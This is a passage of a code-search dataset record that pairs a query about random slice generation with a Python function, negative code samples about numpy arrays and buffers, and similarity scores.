block_size))\n\n data = []\n for dtype in dtypes:\n r = np.fromfile(self._fp, dtype=dtype, count=num_blocks)\n if len(r) != num_blocks:\n raise FortranFormattingError(\n \"End of file in the middle of a record\")\n if dtype.shape != ():\n # Squeeze outmost block dimension for array items\n if num_blocks == 1:\n assert r.shape == (1,) + dtype.shape\n r = r[0]\n\n data.append(r)\n\n second_size = self._read_size()\n if first_size != second_size:\n raise IOError('Sizes do not agree in the header and footer for '\n 'this record - check header dtype')\n\n # Unpack result\n if len(dtypes) == 1:\n return data[0]\n else:\n return tuple(data)", "def to_ndarray(item):\n \n return type(item), sp.array(item, sp.float64, ndmin=1)", "def chunkize_serial(iterable, chunksize, as_numpy=False, dtype=np.float32):\n it = iter(iterable)\n while True:\n if as_numpy:\n # convert each document to a 2d numpy array (~6x faster when transmitting\n # chunk data over the wire, in Pyro)\n wrapped_chunk = [[np.array(doc, dtype=dtype) for doc in itertools.islice(it, int(chunksize))]]\n else:\n wrapped_chunk = [list(itertools.islice(it, int(chunksize)))]\n if not wrapped_chunk[0]:\n break\n # memory opt: wrap the chunk and then pop(), to avoid leaving behind a dangling reference\n yield wrapped_chunk.pop()", "def ndarray_from_structure(items, fmt, t, flags=0):\n memlen, itemsize, ndim, shape, strides, offset = t\n return ndarray(items, shape=shape, strides=strides, 
format=fmt,\n offset=offset, flags=ND_WRITABLE|flags)", "def ndarray_from_structure(items, fmt, t, flags=0):\n memlen, itemsize, ndim, shape, strides, offset = t\n return ndarray(items, shape=shape, strides=strides, format=fmt, offset=\n offset, flags=ND_WRITABLE | flags)", "def numpy_array_from_structure(items, fmt, t):\n memlen, itemsize, ndim, shape, strides, offset = t\n buf = bytearray(memlen)\n for j, v in enumerate(items):\n struct.pack_into(fmt, buf, j*itemsize, v)\n return numpy_array(buffer=buf, shape=shape, strides=strides,\n dtype=fmt, offset=offset)", "def itemsize(self):\n return self.dtype.base.itemsize", "def itemsize(self):\n return self.dtype.base.itemsize", "def itemsize(self):\n return self.dtype.base.itemsize", "def itemsize(self):\n return self.dtype.base.itemsize", "def numpy_array_from_structure(items, fmt, t):\n memlen, itemsize, ndim, shape, strides, offset = t\n buf = bytearray(memlen)\n for j, v in enumerate(items):\n struct.pack_into(fmt, buf, j * itemsize, v)\n return numpy_array(buffer=buf, shape=shape, strides=strides, dtype=fmt,\n offset=offset)", "def as_buffer(\n cls,\n obj: torch.Tensor,\n counts: Tuple[int] = None,\n displs: Tuple[int] = None,\n is_contiguous: Optional[bool] = None,\n ) -> List[Union[MPI.memory, Tuple[int, int], MPI.Datatype]]:\n squ = False\n if not obj.is_contiguous() and obj.ndim == 1:\n # this makes the math work below this function.\n obj.unsqueeze_(-1)\n squ = True\n\n mpi_type, elements = cls.mpi_type_and_elements_of(obj, counts, displs, is_contiguous)\n mpi_mem = cls.as_mpi_memory(obj)\n if squ:\n # the squeeze happens in the mpi_type_and_elements_of function in the case of a\n # non-contiguous 1D tensor. Squeezing it puts the memory back to where it should be\n obj.squeeze_(-1)\n return [mpi_mem, elements, mpi_type]", "def ShapeToArray(inputgeodf, cellsize, valfield=None, fillval=0):\n extent = inputgeodf.total_bounds\n outshape = (int(round((extent[3] - extent[1]) / cellsize)), int(round((extent[2] - extent[0]) / cellsize)))\n trans = Affine(cellsize, 0, extent[0], 0, -cellsize, extent[3])\n if valfield is None:\n arr = features.rasterize(inputgeodf[inputgeodf.geometry.name], out_shape=outshape, fill=fillval, transform=trans)\n else:\n arr = features.rasterize(tuple(zip(inputgeodf[inputgeodf.geometry.name], inputgeodf[valfield])), out_shape=outshape, fill=fillval, transform=trans)\n return arr, trans, extent", "def _read_data(self):\n return [np.array([]), np.array([])]", "def uncompressed_unpack_from(self, bytes_string, offset=0):\r\n if self.element_type is bool:\r\n bitfield, bitfield_size = self.bitfield_packer.unpack_from(bytes_string, offset)\r\n return self.iterable_cls(bitfield), bitfield_size\r\n\r\n element_count, count_size = self.count_packer.unpack_from(bytes_string, offset)\r\n\r\n element_get_size = self.element_packer.size\r\n element_unpack = self.element_packer.unpack_from\r\n\r\n original_offset = offset\r\n offset += count_size\r\n\r\n # Fixed length unpacking\r\n if not self.is_variable_sized:\r\n data = bytes_string[offset:]\r\n element_size = element_get_size()\r\n partitioned_iterable = partition_iterable(data, element_size, element_count)\r\n elements = self.iterable_cls([element_unpack(x)[0] for x in partitioned_iterable])\r\n return elements, count_size + element_count * element_size\r\n\r\n # Variable length unpacking\r\n add_element = self.__class__.iterable_add\r\n elements = self.iterable_cls()\r\n\r\n for _ in range(element_count):\r\n element, element_size = element_unpack(bytes_string, 
offset)\r\n add_element(elements, element)\r\n\r\n offset += element_size\r\n\r\n return elements, offset - original_offset", "def _batchify(self, data, align_right=False, include_lengths=False):\n lengths = [x.size(0) for x in data]\n max_length = max(lengths)\n out = data[0].new(len(data), max_length).fill_(neusum.Constants.PAD)\n for i in range(len(data)):\n data_length = data[i].size(0)\n offset = max_length - data_length if align_right else 0\n out[i].narrow(0, offset, data_length).copy_(data[i])\n\n if include_lengths:\n return out, lengths\n else:\n return out", "def provide_data(self):\n return [(k, tuple([self.batch_size] + list(v.shape[1:]))) for k, v in self._data]", "def chunkize_serial(iterable, chunksize, as_numpy=False):\n\n it = iter(iterable)\n while True:\n if as_numpy:\n # convert each document to a 2d numpy array (~6x faster when transmitting\n # chunk data over the wire, in Pyro)\n wrapped_chunk = [[np.array(doc) for doc in itertools.islice(it, int(chunksize))]]\n else:\n wrapped_chunk = [list(itertools.islice(it, int(chunksize)))]\n if not wrapped_chunk[0]:\n break\n # memory opt: wrap the chunk and then pop(), to avoid leaving behind a dangling reference\n yield wrapped_chunk.pop()", "def test_array_as_buffer_ndim(parser):\n doc = parser.parse(b'''[[\n [1.0, 2.0],\n [3.0, 4.0]\n ]]''')\n view = memoryview(doc.as_buffer(of_type='d'))\n assert len(view) == 32", "def get_data(queue, item_count):\n return [loads(queue.get()) for _ in range(item_count)]", "def values_chunked(items, endtype, chunk_dim=10):\n ilengths = [len(x) for x in items]\n n = len(items)\n items = [np.array(x) for x in items]\n if n > chunk_dim:\n p = n - chunk_dim\n q = chunk_dim\n outer = itertools.product(*(items[0:p]))\n else:\n p = 0\n q = n\n\n def outer_iter():\n yield ()\n\n outer = outer_iter()\n\n chunk = np.zeros(\n [np.prod(ilengths[p:]), len(items)], dtype=int).view(endarray)\n chunk.endtype = endtype\n chunk[:, p:] = np.indices(ilengths[p:]).reshape(q, -1).T\n for i in range(p, n):\n chunk[:, i] = items[i][chunk[:, i]]\n for seq in outer:\n chunk[:, :p] = seq\n yield chunk", "def read(self, size):\n if size % self.recordsize != 0:\n raise ValueError(\"Cannot read a non-integer number of records\")\n\n # ensure we do not read beyond end\n size = min(size, len(self.indices) * self.blocksize - self.offset)\n if size <= 0:\n raise EOFError('At end of file in MultiFile.read')\n\n # allocate buffer for MPI read\n z = np.empty(size, dtype=np.int8)\n\n # read one or more pieces\n iz = 0\n while(iz < size):\n block, already_read = divmod(self.offset, self.blocksize)\n fh_size = min(size - iz, self.blocksize - already_read)\n fh_index = self.indices[block]\n if fh_index >= 0:\n z[iz:iz+fh_size] = np.fromstring(self.fh_raw[fh_index]\n .read(fh_size), dtype=z.dtype)\n else:\n z[iz:iz+fh_size] = 0\n self.offset += fh_size\n iz += fh_size\n\n return z", "def strides_from_shape(ndim, shape, itemsize, layout):\n if ndim == 0:\n return ()\n if layout == 'C':\n strides = list(shape[1:]) + [itemsize]\n for i in range(ndim - 2, -1, -1):\n strides[i] *= strides[i + 1]\n else:\n strides = [itemsize] + list(shape[:-1])\n for i in range(1, ndim):\n strides[i] *= strides[i - 1]\n return strides", "def _raw_itemsize(self):\n if _has_unicode_fields(self):\n total_itemsize = 0\n for field in self.dtype.fields.values():\n itemsize = field[0].itemsize\n if field[0].kind == \"U\":\n itemsize = itemsize // 4\n total_itemsize += itemsize\n return total_itemsize\n else:\n # Just return the normal itemsize\n return 
self.itemsize", "def split(\n items: typing.List[typing.Any],\n sizes: typing.List[float],\n random_state: int = 42,\n stratify: typing.Sequence[typing.Hashable] = None,\n group: typing.Sequence[typing.Hashable] = None,\n preserve: typing.Sequence[typing.Optional[int]] = None,\n) -> typing.Sequence[typing.Any]:\n splits: typing.List[typing.List[typing.Any]] = [[] for _ in range(len(sizes))]\n if group is None:\n group = list(range(len(items)))\n if stratify is None:\n stratify = [0] * len(items)\n if preserve is not None:\n assert len(items) == len(\n preserve\n ), \"When preserve is provided, it must be the same length as items.\"\n for item, preserveIdx in zip(items, preserve):\n if preserveIdx is not None:\n splits[preserveIdx].append(item)\n ideal_counts = [s * len(items) for s in sizes]\n items, stratify, group = [\n [\n entry\n for entry, preserveIdx in zip(current_list, preserve)\n if preserveIdx is None\n ]\n for current_list in [items, stratify, group]\n ]\n if len(items) == 0:\n # There's nothing left to split.\n return splits\n # Rebalance sizes so that we shuffle the remaining\n # items into the splits to try and match the originally\n # desired sizes.\n offsets = [\n max(target - len(split), 0) for split, target in zip(splits, ideal_counts)\n ]\n sizes = [offset / sum(offsets) for offset in offsets]\n assert (\n 0.99 < sum(sizes) < 1.01\n ), f\"The sizes must add up to 1.0 (they added up to {sum(sizes)}).\"\n assert len(group) == len(items), \"group must be the same length as the collection.\"\n assert len(stratify) == len(\n items\n ), \"stratify must be the same length as the collection.\"\n rng = np.random.default_rng(seed=random_state)\n grouped = [\n {**dict(zip([\"idxs\", \"stratifiers\"], zip(*grouper))), \"group\": g}\n for g, grouper in groupby_unsorted(\n list(zip(range(len(stratify)), stratify)),\n key=lambda v: typing.cast(typing.Sequence[typing.Hashable], group)[v[0]],\n )\n ]\n hashes = {\n h: list(g)\n for h, g in groupby_unsorted(\n grouped, key=lambda g: hash(tuple(set(g[\"stratifiers\"])))\n )\n }\n for subgroups in hashes.values():\n for a, u in zip(\n rng.choice(len(sizes), size=len(subgroups), p=sizes),\n subgroups,\n ):\n splits[a].extend(items[idx] for idx in u[\"idxs\"])\n return splits", "def item(self):\n if self.data.shape != ():\n raise RuntimeError(\"Cannot call item on non-scalar type!\")\n return self.data", "def _serialize_data(self) -> Tuple[np.ndarray, np.ndarray]:\n\n def _serialize(data):\n buffer = pickle.dumps(data, protocol=4)\n return np.frombuffer(buffer, dtype=np.uint8)\n\n serialized_data_infos_list = [_serialize(x) for x in self.data_infos]\n address_list = np.asarray([len(x) for x in serialized_data_infos_list],\n dtype=np.int64)\n data_address: np.ndarray = np.cumsum(address_list)\n serialized_data_infos = np.concatenate(serialized_data_infos_list)\n\n return serialized_data_infos, data_address", "def verify_structure(memlen, itemsize, ndim, shape, strides, offset):\n if offset % itemsize:\n return False\n if offset < 0 or offset+itemsize > memlen:\n return False\n if any(v % itemsize for v in strides):\n return False\n\n if ndim <= 0:\n return ndim == 0 and not shape and not strides\n if 0 in shape:\n return True\n\n imin = sum(strides[j]*(shape[j]-1) for j in range(ndim)\n if strides[j] <= 0)\n imax = sum(strides[j]*(shape[j]-1) for j in range(ndim)\n if strides[j] > 0)\n\n return 0 <= offset+imin and offset+imax+itemsize <= memlen" ]
[ "0.77506953", "0.49568605", "0.48241737", "0.48023552", "0.47398067", "0.4713811", "0.47077888", "0.46982223", "0.4669957", "0.4669957", "0.4669957", "0.4669957", "0.46594286", "0.4643557", "0.459365", "0.4521161", "0.45037562", "0.44983464", "0.4494086", "0.4490511", "0.44542786", "0.44342387", "0.44077992", "0.44038826", "0.4376349", "0.4374872", "0.43747061", "0.43722403", "0.437079", "0.43689886" ]
0.77280533
1
Generate random slice for a single dimension of length n. If allow_empty=True, the slices may be empty, otherwise they will be nonempty.
def rslice(n, allow_empty=False):
    minlen = 0 if allow_empty or n == 0 else 1
    slicelen = randrange(minlen, n+1)
    return randslice_from_slicelen(slicelen, n)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rslice(n, allow_empty=False):\n minlen = 0 if allow_empty or n == 0 else 1\n slicelen = randrange(minlen, n + 1)\n return randslice_from_slicelen(slicelen, n)", "def get_slice(self, n):\n if n == 0:\n return slice(self._lo_atom, self._lo_atom + self._n_atoms)\n raise IndexError(f\"{n} is invalid for a 1 dimension Slice \")", "def rslices(n, allow_empty=False):\n for _ in range(5):\n yield rslice(n, allow_empty)", "def rslices(n, allow_empty=False):\n for _ in range(5):\n yield rslice(n, allow_empty)", "def test_slice_zero_length_dimension(self):\n for i, shape in enumerate([(0,), (0, 3), (0, 2, 1)]):\n dset = self.f.create_dataset('x%d'%i, shape, dtype=int, maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[...]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, shape)\n out = dset[:]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, shape)\n if len(shape) > 1:\n out = dset[:, :1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape[:2], (0, 1))", "def choose(n, a):\n return torch.as_tensor([a[idx] for idx in torch.randperm(len(a))[:n]])", "def test_slice_zero_length_dimension(setup_teardown_file):\n f = setup_teardown_file[3]\n\n for i, shape in enumerate([(0,), (0, 3), (0, 2, 1)]):\n dset = f.create_dataset('x%d'%i, shape, dtype=np.int32)\n assert dset.shape == shape\n out = dset[...]\n assert isinstance(out, np.ndarray)\n assert out.shape == shape\n out = dset[:]\n assert isinstance(out, np.ndarray)\n assert out.shape == shape\n if len(shape) > 1:\n out = dset[:, :1]\n assert isinstance(out, np.ndarray)\n assert out.shape[:2] == (0, 1)", "def n_random_crop(img, height, width, n):\n crops = []\n img_width, img_height = img.shape\n for i in range(n):\n x = np.random.randint(0, img_width - width)\n y = np.random.randint(0, img_height - height)\n crops.append(img[x:x + height, y:y + width])\n return np.array(crops)", "def _sample(self, n=1):\n return [self[i] for i in np.random.choice(self.length, n, replace=False)]", "def randslice_from_shape(ndim, shape):\n lslices = [0] * ndim\n rslices = [0] * ndim\n for n in range(ndim):\n l = shape[n]\n slicelen = randrange(1, l+1) if l > 0 else 0\n lslices[n] = randslice_from_slicelen(slicelen, l)\n rslices[n] = randslice_from_slicelen(slicelen, l)\n return tuple(lslices), tuple(rslices)", "def test_slice_of_length_zero(self):\n for i, shape in enumerate([(3,), (2, 2,), (2, 1, 5)]):\n dset = self.f.create_dataset('x%d'%i, data=np.zeros(shape, int), maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[1:1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, (0,)+shape[1:])", "def randslice_from_shape(ndim, shape):\n lslices = [0] * ndim\n rslices = [0] * ndim\n for n in range(ndim):\n l = shape[n]\n slicelen = randrange(1, l + 1) if l > 0 else 0\n lslices[n] = randslice_from_slicelen(slicelen, l)\n rslices[n] = randslice_from_slicelen(slicelen, l)\n return tuple(lslices), tuple(rslices)", "def random_slice(l: list, size: int) -> list:\n first = randint(0, len(l) - size)\n return l[first:first+size]", "def genslices(n):\n def range_with_none():\n yield None\n yield from range(-n, n+1)\n\n for t in product(range_with_none(), range_with_none(), range_with_none()):\n s = slice(*t)\n if s.step != 0:\n yield s", "def _select_n(arr, n):\n selection = []\n\n idx = range(0, len(arr))\n for x in range(n):\n if len(idx) == 0:\n break\n i = randint(0, len(idx) - 1)\n selection.append(arr[idx[i]])\n del idx[i]\n\n return 
selection", "def rand_elem(seq, n=None):\n return map(random.choice, repeat(seq, n) if n is not None else repeat(seq))", "def random(size, nulls=False):\n import numpy as np\n r = np.random.random(size)\n if nulls:\n idx = np.random.randint(0, r.size, size=max(1, r.size//4))\n r[idx] = np.nan\n return r", "def test_slice_of_length_zero(setup_teardown_file):\n f = setup_teardown_file[3]\n\n for i, shape in enumerate([(3, ), (2, 2, ), (2, 1, 5)]):\n dset = f.create_dataset('x%d'%i, data=np.zeros(shape, np.int32))\n assert dset.shape == shape\n out = dset[1:1]\n assert isinstance(out, np.ndarray)\n assert out.shape == (0,)+shape[1:]", "def sample(num_dims, num_samples):\n samples = np.random.rand(num_samples, num_dims)\n ### TODO: Update with a uniform sampling plan to fill space\n return samples", "def random_board(n):\r\n \r\n return(np.random.randint(0,n-1, size = n))", "def samples_multidimensional_uniform(bounds, points_count):\n dim = len(bounds)\n Z_rand = np.zeros(shape=(points_count, dim))\n for k in range(0,dim):\n Z_rand[:,k] = np.random.uniform(low=bounds[k][0], high=bounds[k][1], size=points_count)\n print('shape: ', Z_rand.shape)\n return Z_rand", "def random(self, n=1):\n # Generate a sample using a Van der Corput sequence per dimension.\n # important to have ``type(bdim) == int`` for performance reason\n sample = [van_der_corput(n, int(bdim), self.num_generated,\n scramble=self.scramble,\n seed=copy.deepcopy(self.seed))\n for bdim in self.base]\n\n self.num_generated += n\n return np.array(sample).T.reshape(n, self.d)", "def sample(self, n):\n idx = np.random.randint(0, len(self.memory), size=n)\n return [self.memory[i] for i in idx]", "def randn(*args):\n dims = list(args)\n assert type(dims[0]) == int\n return params_func(cmd, \"randn\", params=dims, return_type='FloatTensor')", "def randslice_from_slicelen(slicelen, listlen):\n maxstart = listlen - slicelen\n start = randrange(maxstart+1)\n maxstep = (listlen - start) // slicelen if slicelen else 1\n step = randrange(1, maxstep+1)\n stop = start + slicelen * step\n s = slice(start, stop, step)\n _, _, _, control = slice_indices(s, listlen)\n if control != slicelen:\n raise RuntimeError\n return s", "def random_sample(self, n):\n indices = random.sample(xrange(np.shape(self.data)[0]), n)\n table = DataTable(self.data[indices], self.dims, self.legends, self.tags.copy())\n return table", "def randslice_from_slicelen(slicelen, listlen):\n maxstart = listlen - slicelen\n start = randrange(maxstart + 1)\n maxstep = (listlen - start) // slicelen if slicelen else 1\n step = randrange(1, maxstep + 1)\n stop = start + slicelen * step\n s = slice(start, stop, step)\n _, _, _, control = slice_indices(s, listlen)\n if control != slicelen:\n raise RuntimeError\n return s", "def simple_slice():\n examples = [\n benchmark.Example(\n inputs=[\n [[12, 34, 56, 78], [-1, -2, -3, -4]],\n -1,\n ],\n output=[[34, 56], [-2, -3]],\n ),\n ]\n constants = []\n description = 'Slice a tensor'\n target_program = 'in1[:, 1:in2]'\n source = 'handwritten task'\n return benchmark.Benchmark(examples=examples,\n constants=constants,\n description=description,\n target_program=target_program,\n source=source,\n name='simple_slice')", "def test_slice_other_dimension(self):\n for i, shape in enumerate([(3, 0), (1, 2, 0), (2, 0, 1)]):\n dset = self.f.create_dataset('x%d'%i, shape, dtype=int, maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[:1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, (1,)+shape[1:])", 
"def rand_aligned_slices(maxdim=5, maxshape=16):\n ndim = randrange(1, maxdim + 1)\n minshape = 2\n n = randrange(100)\n if n >= 95:\n minshape = 0\n elif n >= 90:\n minshape = 1\n all_random = True if randrange(100) >= 80 else False\n lshape = [0] * ndim\n rshape = [0] * ndim\n lslices = [0] * ndim\n rslices = [0] * ndim\n for n in range(ndim):\n small = randrange(minshape, maxshape + 1)\n big = randrange(minshape, maxshape + 1)\n if big < small:\n big, small = small, big\n if all_random:\n start = randrange(-small, small + 1)\n stop = randrange(-small, small + 1)\n step = (1, -1)[randrange(2)] * randrange(1, small + 2)\n s_small = slice(start, stop, step)\n _, _, _, slicelen = slice_indices(s_small, small)\n else:\n slicelen = randrange(1, small + 1) if small > 0 else 0\n s_small = randslice_from_slicelen(slicelen, small)\n s_big = randslice_from_slicelen(slicelen, big)\n if randrange(2) == 0:\n rshape[n], lshape[n] = big, small\n rslices[n], lslices[n] = s_big, s_small\n else:\n rshape[n], lshape[n] = small, big\n rslices[n], lslices[n] = s_small, s_big\n return lshape, rshape, tuple(lslices), tuple(rslices)" ]
[ "0.77326006", "0.70148605", "0.6813906", "0.6813906", "0.6412858", "0.63864595", "0.62999004", "0.6264508", "0.61941475", "0.6164201", "0.616065", "0.6156945", "0.6141035", "0.61246413", "0.61231834", "0.605221", "0.60043675", "0.60013884", "0.59873164", "0.5930526", "0.5928254", "0.59057784", "0.5902516", "0.58677346", "0.58563673", "0.5855074", "0.58475477", "0.5841148", "0.5829778", "0.58039653" ]
0.77208936
1
Print ndarray for debugging.
def ndarray_print(nd):
    try:
        x = nd.tolist()
    except (TypeError, NotImplementedError):
        x = nd.tobytes()
    if isinstance(nd, ndarray):
        offset = nd.offset
        flags = nd.flags
    else:
        offset = 'unknown'
        flags = 'unknown'
    print("ndarray(%s, shape=%s, strides=%s, suboffsets=%s, offset=%s, "
          "format='%s', itemsize=%s, flags=%s)" %
          (x, nd.shape, nd.strides, nd.suboffsets, offset,
           nd.format, nd.itemsize, flags))
    sys.stdout.flush()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ndarray_print(nd):\n try:\n x = nd.tolist()\n except (TypeError, NotImplementedError):\n x = nd.tobytes()\n if isinstance(nd, ndarray):\n offset = nd.offset\n flags = nd.flags\n else:\n offset = 'unknown'\n flags = 'unknown'\n print(\n \"ndarray(%s, shape=%s, strides=%s, suboffsets=%s, offset=%s, format='%s', itemsize=%s, flags=%s)\"\n % (x, nd.shape, nd.strides, nd.suboffsets, offset, nd.format, nd.\n itemsize, flags))\n sys.stdout.flush()", "def show(self):\n m = [xo_convert(int(x)) for x in np.nditer(self.arr)]\n print(\"{} | {} | {}\".format(*m[:3]))\n print(\"--+---+--\")\n print(\"{} | {} | {}\".format(*m[3:6]))\n print(\"--+---+--\")\n print(\"{} | {} | {}\".format(*m[6:]))\n print()", "def print_array(self):\n for item in self.items:\n print(item)", "def print_array(x, idx=slice(None), message=None, message_prefix=\"SHIM - \",\n file=sys.stdout):\n return set_subtensor(x[idx],\n print(x[idx],\n message=message,\n message_prefix=message_prefix,\n file=file\n )\n )", "def dump(self, data_points):\n print(data_points)", "def __repr__(self) -> str:\n\n thresh = np.get_printoptions()[\"threshold\"]\n np.set_printoptions(threshold=20)\n extra_chars = len(self.__class__.__name__)\n arr_str = \"data=\" + str(self.data).replace(\"\\n\", \"\\n\" + \" \" * (extra_chars + 6))\n shape_str = (\n \" \" * extra_chars\n + \" shape=\"\n + str(self.shape).replace(\"\\n\", \"\\n\" + \" \" * (extra_chars + 7))\n )\n dtype_str = \" \" * extra_chars + \" dtype=\" + str(self.dtype)\n np.set_printoptions(threshold=thresh)\n return \"{klass}({data},\\n{shape},\\n{dtype})\".format(\n klass=self.__class__.__name__,\n data=arr_str,\n shape=shape_str,\n dtype=dtype_str,\n )", "def pretty_print(image_example):\n print numpy.array_str(image_example, precision=1, max_line_width=142)", "def print_numpy(x, val=True, shp=False):\n x = x.astype(np.float64)\n if shp:\n print('shape,', x.shape)\n if val:\n x = x.flatten()\n print('mean = %3.3f, min = %3.3f, max = %3.3f, median = %3.3f, std=%3.3f' % (\n np.mean(x), np.min(x), np.max(x), np.median(x), np.std(x)))", "def print_numpy(x, val=True, shp=False):\n x = x.astype(np.float64)\n if shp:\n print('shape,', x.shape)\n if val:\n x = x.flatten()\n print('mean = %3.3f, min = %3.3f, max = %3.3f, median = %3.3f, std=%3.3f' % (\n np.mean(x), np.min(x), np.max(x), np.median(x), np.std(x)))", "def print_numpy(x, val=True, shp=False):\n x = x.astype(np.float64)\n if shp:\n print('shape,', x.shape)\n if val:\n x = x.flatten()\n print('mean = %3.3f, min = %3.3f, max = %3.3f, median = %3.3f, std=%3.3f' % (\n np.mean(x), np.min(x), np.max(x), np.median(x), np.std(x)))", "def print_numpy(x, val=True, shp=False):\n x = x.astype(np.float64)\n if shp:\n print('shape,', x.shape)\n if val:\n x = x.flatten()\n print('mean = %3.3f, min = %3.3f, max = %3.3f, median = %3.3f, std=%3.3f' % (\n np.mean(x), np.min(x), np.max(x), np.median(x), np.std(x)))", "def _showdata(self, prec=4):\n print('nh {0:d} nslices {1:d} nbl {2:d} ncp {3:d} nca {4:d} '.format(\n self.nh, self.nslices, self.nbl, self.ncp, self.nca), end=\"\")\n print(\"observables in np arrays with {:d} rows\".format(self.nslices))\n\n if len(self.observables) == 4:\n print('nca', self.nca)\n else:\n print()\n np.set_printoptions(precision=prec)\n\n print(self.fp.shape, \"fp (degrees, but stored internally in radians):\\n\",\n self.fp*self.degree, \"\\n\")\n print(self.fa.shape, \"fa:\\n\", self.fa, \"\\n\")\n\n print(self.cp.shape, \"cp (degrees, but stored internally in radians):\\n\",\n self.cp*self.degree, \"\\n\")\n if 
len(self.observables) == 4:\n print(self.ca.shape, \"ca:\\n\", self.ca, \"\\n\")\n # print(self.info4oif_dict)\n\n print(\"hole centers array shape:\", self.ctrs.shape)\n\n print(len(self.bholes), \"baseline hole indices\\n\", self.bholes)\n print(self.bls.shape, \"baselines:\\n\", self.bls)\n\n print(self.tholes.shape, \"triple hole indices:\\n\", self.tholes)\n print(self.tuv.shape, \"triple uv vectors:\\n\", self.tuv)\n\n print(self.qholes.shape, \"quad hole indices:\\n\", self.qholes)\n print(self.quvw.shape, \"quad uvw vectors:\\n\", self.quvw)", "def _print_matrix(self):\n print(self.matrix)", "def show(arr2d):\n print (\"\\n\".join(\"\\t\".join(row) for row in arr2d))", "def __str__(self):\n return str(self.array)", "def report(self):\n s = \"Conn %s\" % (self.shape,)\n if hasattr(self,'eltype'):\n s += \", eltype=%s\" % self.eltype\n s += '\\n'\n return s + ndarray.__str__(self)", "def __str__(self):\n return str(self.arr)", "def debug(self):\n print(self.memory)\n print('r0 = %s, ip = %s' % (self.r0, self.ip))", "def printArray(arr):\n for entry in arr:\n print(entry)", "def __debug_print__(self):\n print(self.question_data)", "def print(self):\n self.__print_local(self.dataset, 0)", "def info_np(img):\n import numpy as np\n\n print ('Dimensions: ' + str(np.shape(img)))\n print ('Min value: ' + str(np.min(img)))\n print ('Avg value: ' + str(np.average(img)))\n print ('Med value: ' + str(np.median(img)))\n print ('Max value: ' + str(np.max(img)))\n print ('Std dev: ' + str(np.std(img)))\n print ('Sum: ' + str(np.sum(img)))", "def show(self, data):\n if isinstance(data, (numpy.ndarray, h5py.Dataset)):\n isAtomic = len(data.shape) == 0\n isCurve = len(data.shape) == 1 and numpy.issubdtype(data.dtype, numpy.number)\n isImage = len(data.shape) == 2 and numpy.issubdtype(data.dtype, numpy.number)\n if isAtomic:\n self.showAsString(data)\n elif isCurve:\n self.show1d(data)\n elif isImage:\n self.show2d(data)\n else:\n self.showAsString(data)\n else:\n self.showAsString(data)", "def debug(self):\n neighbors = len(self.__neighbors)\n string = self.__repr__() + f' neighbors: {self.living_neighbors()}/{neighbors}'\n for neighbor in self.__neighbors:\n string += '\\n ' + neighbor.__repr__()\n print(string)", "def print_multi_numpy(x_, val=True, shp=False):\n for i in range(x_.shape[0]):\n x = x_[i].astype(np.float64)\n if shp:\n print('shape,', x.shape)\n if val:\n x = x.flatten()\n print('mean = %3.3f, min = %3.3f, max = %3.3f, median = %3.3f, std=%3.3f' % (\n np.mean(x), np.min(x), np.max(x), np.median(x), np.std(x)))", "def print_shape(self, data):\n print(data.shape)", "def print_full(self):# pragma: no cover\n print('Will now print all optional output arrays - ')\n print(' yint_seg: ')\n print((self.yint_seg))\n print(' ')\n print(' slope_seg: ')\n print(self.slope_seg)\n print(' ')\n print(' sigyint_seg: ')\n print(self.sigyint_seg)\n print(' ')\n print(' sigslope_seg: ')\n print(self.sigslope_seg)\n print(' ')\n print(' inv_var_2d: ')\n print((self.inv_var_2d))\n print(' ')\n print(' firstf_int: ')\n print((self.firstf_int))\n print(' ')\n print(' ped_int: ')\n print((self.ped_int))\n print(' ')\n print(' cr_mag_seg: ')\n print((self.cr_mag_seg))", "def debug(self):\n \n #path\n print('Path information:')\n for k, v in self.__path.items():\n print(k, v)\n \n #sample count\n print('Sample statistic of each phase')\n for k, v in self.__phase_sample_count.items():\n print(k, v)\n \n print('Sample statistic of each class')\n for k, v in self.__area_sample_count.items():\n print(k, v)\n \n 
print('Sample statistic of each train')\n for k, v in self.__train_sample_count.items():\n print(k, v)", "def print(self):\r\n print(\"[DEBUG] STACK: \", self.__memory.__repr__())", "def __repr__(self):\n return repr(self.matrix)" ]
[ "0.7679877", "0.68368405", "0.6631245", "0.6609683", "0.65994364", "0.65967774", "0.6263622", "0.62557095", "0.62557095", "0.62557095", "0.62557095", "0.6235029", "0.6219768", "0.6178411", "0.61287254", "0.6089198", "0.6083977", "0.60370946", "0.60179627", "0.6011618", "0.5987235", "0.5944811", "0.5894297", "0.58930874", "0.58649844", "0.5861188", "0.58610237", "0.58231217", "0.58226687", "0.581801" ]
0.7686053
0
Is (x0, y0) on a shared diagonal with (x1, y1)?
def share_diagonal(x0, y0, x1, y1):\n    return abs(x0 - x1) == abs(y0 - y1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def share_diagonal(x0, y0, x1, y1):\r\n dy = abs(y1 - y0) # Calc the absolute y distance\r\n dx = abs(x1 - x0) # CXalc the absolute x distance\r\n return dx == dy # They clash if dx == dy\r", "def share_diagonal(x0, y0, x1, y1):\r\n dy = abs(y1 - y0) # Calc the absolute y distance\r\n dx = abs(x1 - x0) # CXalc the absolute x distance\r\n return dx == dy # They clash if dx == dy\r", "def share_diagonal(x0, y0, x1, y1):\n dy = abs(y1 - y0) # Calc the absolute y distance\n dx = abs(x1 - x0) # CXalc the absolute x distance\n return dx == dy # They clash if dx == dy", "def share_diagonal(x0, y0, x1, y1):\n dy = abs(y1 - y0) # absolute y distance\n dx = abs(x1 - x0) # absolute x distance\n return dx == dy # they clash if dx == dy, share diagonal", "def share_diagonal(x0, y0, x1, y1):\n dy = abs((x0-x1)/(y0-y1))\n return dy", "def is_diagonal(i, j):\n return 1 if i == j else 0", "def is_diagonal(i, j):\n return 1 if i == j else 0", "def is_diagonal(row, col):\n return 1 if row == col else 0", "def 